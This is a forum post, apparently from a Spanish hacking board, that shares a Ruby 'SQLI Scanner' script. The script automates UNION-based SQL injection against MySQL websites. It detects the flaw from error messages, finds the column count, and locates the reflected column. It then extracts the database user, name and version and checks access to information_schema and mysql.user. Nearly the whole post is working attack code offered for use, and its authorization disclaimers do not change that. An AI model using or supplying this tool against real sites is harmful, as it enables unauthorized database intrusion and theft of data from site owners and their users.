[Ruby] SQLI Scanner

Iniciado por BigBear, 7 Octubre 2011, 01:32 AM


BigBear

Un scanner de SQLi (inyección SQL basada en UNION, pensado para MySQL) escrito en Ruby: comprueba si el sitio muestra el error de MySQL al hacer `-1 union select 1`, busca el número de columnas (de 2 a 25), localiza la columna que se refleja en la página y a través de ella extrae `user()`, `database()` y `version()`. Úsalo solo contra sitios en los que tengas autorización para hacer pruebas.


#!usr/bin/ruby
#SQLI Scannerl (C) Doddy Hackman 2010
#contact me : doddy-hackman.blogspot.com

require 'net/http'


# Print the one-line usage banner shown when no target URL was supplied.
def uso
  $stdout.print("\n[+] sqli.rb <site>\n")
end

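# Fetch +path+ from +host+ over plain HTTP and return the raw response body.
#
# host:: hostname or IP of the target (no scheme, no port)
# path:: request-target as the callers build it by hand: path plus "?query"
#        plus the injected payload
# port:: TCP port; defaults to 80 exactly as the original hard-coded it, so
#        existing two-argument callers are unchanged. A caller whose URL has
#        a non-default port should pass +url.port+.
#
# Returns the body as a String; a response with no body yields "" rather
# than nil so the callers' regex matches never see nil.
#
# Raises the usual net/http and socket errors (SocketError,
# Errno::ECONNREFUSED, Net::OpenTimeout, Net::ReadTimeout). The original
# set no timeouts at all, so a target that accepted the connection and then
# stayed silent would hang the whole scan forever; 10s per request bounds
# that. Only HTTP is spoken here — an https:// target is not supported.
def toma(host, path, port = 80)
  http = Net::HTTP.new(host, port)
  http.open_timeout = 10
  http.read_timeout = 10
  http.get(path).body.to_s
end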

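# Second phase of the scan: once scan() knows the UNION column layout, pull
# user(), database() and version() through the column that is echoed into
# the page, then probe whether information_schema.tables and mysql.user are
# readable by the application's DB user.
#
# web::  the target URL as given on the command line. The payload is glued
#        directly onto the end of its query string (e.g. "id=1" becomes
#        "id=1-1+union+select+..."), so the LAST query parameter is the
#        injection point.
# more:: the "-1+union+select+1,2,..." payload built by scan(); the literal
#        "hackman" marks the column that is reflected in the response.
#
# Prints its findings and returns nil. This sends attack payloads to the
# target — only run it against systems you are authorised to test.
def details(web, more)
  marker = "0x4b30425241" # MySQL hex literal for "K0BRA", the delimiter we look for in the page
  # Swap the "hackman" placeholder for the bare marker (table-readability
  # probes) or for the concat() that leaks the DB identity.
  probe_payload = more.sub(/hackman/, marker)
  info_payload  = more.sub(/hackman/, "concat(#{marker},user(),#{marker},database(),#{marker},version(),#{marker})")
  print "\n\n[+] Extrating information of the DB\n\n"
  url = URI.parse(web)
  # url.query is nil when the URL carries no "?" — the original String#+
  # raised TypeError there; url.path is "" for a bare host, which net/http
  # would send as an invalid request-target.
  path = url.path.empty? ? "/" : url.path
  base = path + "?" + url.query.to_s
  code = toma(url.host, base + info_payload)
  found = code.match(/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/)
  unless found
    print "\n[-] Not Found\n\n"
    return
  end
  username, database, version = found.captures
  print "[username] : " + username + "\n"
  print "[database] : " + database + "\n"
  print "[version] : " + version + "\n\n"
  # If the marker still comes back when the UNION is aimed at these tables,
  # the DB user is allowed to SELECT from them.
  tables_body = toma(url.host, base + probe_payload + "+from+information_schema.tables")
  users_body  = toma(url.host, base + probe_payload + "+from+mysql.user")
  print "[information_schema.tables] : ON\n" if tables_body =~ /K0BRA/
  print "[mysql.user] : ON" if users_body =~ /K0BRA/
  nil
end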


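# First phase of the scan: check for a MySQL UNION-based SQL injection on the
# last query parameter of +web+, find how many columns the vulnerable SELECT
# has, find which column is echoed into the page, then hand the resulting
# payload to details(). Every path ends in copyright(), which exits the
# process, so this method never returns normally.
#
# web::         target URL; the payload is appended to its query string with
#               no separator, so the last parameter is the injection point
# max_columns:: highest column count to try (the original hard-coded 25);
#               the search starts at 2 because the error-based check below
#               only fires when the real column count differs from 1
#
# The detection step is error-based: only a MySQL target that prints its SQL
# errors into the page will trip it, so a silent or non-MySQL target is
# reported as "Not Vulnerable" even if it is injectable. This sends attack
# payloads to the target — only run it against systems you are authorised
# to test.
def scan(web, max_columns = 25)
  marker = "0x4b30425241" # MySQL hex literal for "K0BRA", the delimiter we look for in the page
  print "\n[+] Testing the vulnerability SQLI...\n\n"
  url = URI.parse(web)
  # url.query is nil when the URL carries no "?" — the original String#+
  # raised TypeError there; url.path is "" for a bare host, which net/http
  # would send as an invalid request-target.
  path = url.path.empty? ? "/" : url.path
  base = path + "?" + url.query.to_s

  codetest = toma(url.host, base + "-1+union+select+1")
  if codetest =~ /The used SELECT statements have a different number of columns/
    print "[+] SQLI Detected\n\n"
  else
    print "[-] Not Vulnerable to SQLI\n\n"
    copyright()
  end

  (2..max_columns).each do |num|
    cols = (1..num).map(&:to_s)
    # Same probe as the original: every column wrapped in concat(marker,n,marker),
    # so the page echoes "K0BRA<n>K0BRA" for whichever column it renders.
    probe = cols.map { |c| "concat(#{marker},#{c},#{marker})" }.join(",")
    code = toma(url.host, base + "-1+union+select+" + probe)
    found = code.match(/K0BRA(.*?)K0BRA/)
    next unless found
    hit = found[1]
    print "[+] The Page has " + num.to_s + " columns\n"
    print "[+] The number " + hit + " print data\n\n"
    unless cols.include?(hit)
      # The echoed text is not one of our column numbers (the page mangled
      # it). The original did a substring String#sub with it, which silently
      # produced a payload with no "hackman" marker and a guaranteed
      # "Not Found" from details(); keep looking instead.
      print "[-] Reflected value '" + hit + "' is not a column index, trying more columns\n\n"
      next
    end
    # Replace exactly the reflected column by index, not by substring: with
    # String#sub, "1" would also have matched inside "10", "11", ...
    payload = "-1+union+select+" + cols.map { |c| c == hit ? "hackman" : c }.join(",")
    print "[SQLI] : " + web + payload
    details(web, payload)
    copyright()
  end
  print "\n\n[-] Not Found the numbers of the columns\n\n"
  copyright()
end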

# Print the title banner shown at program start.
def head
  $stdout.write("\n\n -- == SQLI Scanner == --\n\n")
end

# Print the credits footer and terminate the process with status 1.
# Every code path in the script ends here, so "exit 1" is the script's
# only exit status, success or not.
def copyright
  $stdout.write("\n\n\n(C) Doddy Hackman 2010\n\n")
  Kernel.exit(1)
end

# Entry point: banner, then either the usage text (no argument) or a scan of
# the URL in ARGV[0]. scan() ends every path in copyright(), which exits, so
# the copyright() after it only runs if scan() ever returns; the final
# copyright() is what the usage path reaches.
head()
if ARGV[0]
  scan(ARGV[0])
  copyright()
else
  uso()
end
copyright()